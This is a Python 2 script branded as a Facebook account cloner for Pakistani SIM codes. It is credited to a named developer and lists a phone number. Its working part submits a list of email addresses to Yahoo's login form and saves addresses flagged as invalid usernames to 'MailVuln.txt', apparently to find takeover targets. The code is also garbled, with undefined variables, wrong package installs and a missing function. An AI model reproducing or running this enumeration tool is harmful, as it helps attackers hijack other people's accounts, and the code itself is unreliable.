# Ustad# SIDRA5# Thuglife# Somibro# Gamz#!/usr/bin/python2
#coding=utf-8
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,getpass
os.system('rm -rf .txt')
for n in range(10000):

    nmbr = random.randint(1111111, 9999999)
    
    sys.stdout = open('ads.txt', 'a')

    print(nmbr)

    sys.stdout.flush()
    
try:
    import requests
except ImportError:
    os.system('pip2 install mechanize')
    
try:
    import mechanize
except ImportError:
    os.system('pip2 install request')
    time.sleep(1)
    os.system('Then type: python2 malik')

import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,requests,mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser


reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
br.addheaders = [('user-agent','Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/106.0.0.26.68;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.facebook.katana;FBDV/ASUS_Z00AD;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;]')]

def keluar():
	print 'Thanks.'
	os.sys.exit()

def acak(b):
    w = 'ahtdzjc'
    d = ''
    for i in x:
        d += '!'+w[random.randint(0,len(w)-1)]+i
    return cetak(d)


def cetak(b):
    w = 'ahtdzjc'
    for i in w:
        j = w.index(i)
        x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
    x += '\033[0m'
    x = x.replace('!0','\033[0m')
    sys.stdout.write(x+'\n')


def jalan(z):
	for e in z + '\n':
		sys.stdout.write(e)
		sys.stdout.flush()
		time.sleep(3.0 / 200)
def tik():
	titik = ['.   ','..  ','... ']
	for o in titik:
		print("\r\x1b[1;92m                     Please Wait \x1b[1;91m"+o),;sys.stdout.flush();time.sleep(1)




os.system("clear")
logo = """
\033[1;94m ######   #######  ##     ## #### 
\033[1;92m##    ## ##     ## ###   ###  ##  
\033[1;96m##       ##     ## #### ####  ##  
 \033[1;92m######  ##     ## ## ### ##  ##  
\033[1;91m      ## ##     ## ##     ##  ##  
\033[1;94m##    ## ##     ## ##     ##  ##  
\033[1;93m ######   #######  ##     ## #### 
\033[1;92m❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛      
\033[1;91m➙DEVOLPER   :    SOMI AWAN
\033[1;96m➙WHATSAAP  :   03455453538
\033[1;93m➙NOTE   :   USE FAST INTERNET
\033[1;90m➙NOTE   :   USE 4 TO 6 GB RAM PHONE
\033[1;92m❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛
"""
logo1 = """
\033[1;94m ######   #######  ##     ## #### 
\033[1;92m##    ## ##     ## ###   ###  ##  
\033[1;96m##       ##     ## #### ####  ##  
 \033[1;92m######  ##     ## ## ### ##  ##  
\033[1;91m      ## ##     ## ##     ##  ##  
\033[1;94m##    ## ##     ## ##     ##  ##  
\033[1;93m ######   #######  ##     ## #### 
\033[1;92m❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛      
\033[1;91m➙DEVOLPER   :    SOMI AWAN
\033[1;96m➙WHATSAAP  :   03455453538
\033[1;93m➙NOTE   :   USE FAST INTERNET
\033[1;90m➙NOTE   :   USE 4 TO 6 GB RAM PHONE
\033[1;92m❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛
"""
logo2  = """
\033[4;92mSELECT YOUR FAVOURITE SIM CODE \033[1;0m
\033[4;97mMOBILINK/JAZZ CODE HERE\033[1;0m
\033[1;96m00, 01, 02, 03, 04,
\033[1;93m05, 06, 07, 08, 09,
\033[4;97mTELINORE CODE HERE\033[1;0m
\033[1;96m40, 41, 42, 43, 44,
\033[1;93m45, 46, 47 ,48 ,49,
\033[4;97mWARID CODE HERE\033[1;0m
\033[1;96m20, 21, 22, 23,
\033[1;93m24, ??, ??, ??,
\033[4;97mUFONE CODE HERE\033[1;0m
\033[1;96m31, 32, 33, 34,
\033[1;93m35, 36, 37, ??,
\033[4;97mZONG CODE HERE\033[1;0m
\033[1;96m10, 11, 12, 13,
\033[1;93m14, 15, 16, 17,
\x1b[0;47m  \x1b[3;90mFACEBOOK ACCOUNT CLONER BY \x1b[3;90mSOMI STAR BOY\033[1;0m
"""


##### LICENSE #####
#=================#
def lisensi():
    os.system('clear')
    login()
####login#########
def login():
    os.system('clear')
    print logo
    print 47* '\033[1;97m.'
    jalan('\x1b[0;91m░██████╗████████╗░█████╗░██████╗░')
    jalan('\x1b[0;91m██╔════╝╚══██╔══╝██╔══██╗██╔══██╗')
    jalan('\x1b[1;91m╚█████╗░░░░██║░░░███████║██████╔╝')
    jalan('\x1b[1;90m░╚═══██╗░░░██║░░░██╔══██║██╔══██╗')
    jalan('\x1b[1;90m██████╔╝░░░██║░░░██║░░██║██║░░██║')
    jalan('\x1b[1;90m╚═════╝░░░░╚═╝░░░╚═╝░░╚═╝╚═╝░░╚═╝')
    print
    jalan('\x1b[0;91m                 ██████╗░░█████╗░██╗░░░██╗')
    jalan('\x1b[0;91m                 ██╔══██╗██╔══██╗╚██╗░██╔╝')
    jalan('\x1b[1;91m                 ██████╦╝██║░░██║░╚████╔╝░')
    jalan('\x1b[1;90m                 ██╔══██╗██║░░██║░░╚██╔╝░░')
    jalan('\x1b[1;90m                 ██████╦╝╚█████╔╝░░░██║░░░')
    jalan('\x1b[1;90m                 ╚═════╝░░╚════╝░░░░╚═╝░░░')
    print
    print
    jalan('\x1b[1;97m⁅\x1b[1;92m1\x1b[1;97m⁆ \x1b[1;92mPAKISTAN\x1b[1;93mCLONING ')
    print
    jalan('\033[1;97m⁅\x1b[1;93m0\x1b[1;97m⁆ \x1b[1;92mEXIT')
    print
    print
    print 47* '\033[1;97m.'
    time.sleep(0.05)
    action()

def action():
    somi = raw_input('\n\033[1;96mTYPE : \033[1;93m')
    if somi =='':
        print '[!] Fill In Correctly'
        action()
    elif somi =="1":              
    	tik()
        os.system("clear")
        print logo1
        print logo2
        print 40 * '\x1b[1;97m\xe2\x95\x90'
        files = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m: \x1b[1;97m')
        try:
            total = open(files, 'r')
            mail = total.readlines()
        except IOError:
            print '\x1b[1;91m[!] File tidak ada'
            raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
            menu_yahoo()

    mpsh = []
    jml = 0
    jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
    save = open('MailVuln.txt', 'w')
    print 40 * '\x1b[1;97m\xe2\x95\x90'
    print '\x1b[1;91m[?] \x1b[1;97mStatus \x1b[1;91m:  \x1b[1;97mRed[\x1b[1;92m' + vulnot + '\x1b[1;97m]  Green[\x1b[1;92m' + vuln + '\x1b[1;97m]'
    print
    mail = open(files, 'r').readlines()
    for pw in mail:
        mail = pw.replace('\n', '')
        jml += 1
        mpsh.append(jml)
        yahoo = re.compile('@.*')
        otw = yahoo.search(mail).group()
        if 'yahoo.com' in otw:
            br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com')
            br._factory.is_html = True
            br.select_form(nr=0)
            br['username'] = mail
            klik = br.submit().read()
            jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*')
            try:
                pek = jok.search(klik).group()
            except:
                print '\x1b[1;91m ' + mail
                continue

            if '"messages.ERROR_INVALID_USERNAME">' in pek:
                save.write(mail + '\n')
                print '\x1b[1;92m ' + mail
            else:
                print '\x1b[1;91m ' + mail

    print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
    print '\x1b[1;91m[+] \x1b[1;97mTersimpan \x1b[1;91m:\x1b[1;97m MailVuln.txt'
    save.close()        
    raw_input("\n\033[1;92m[\033[1;92mBack\033[1;95m]")
    login() 
          
if __name__ == '__main__':
    login()

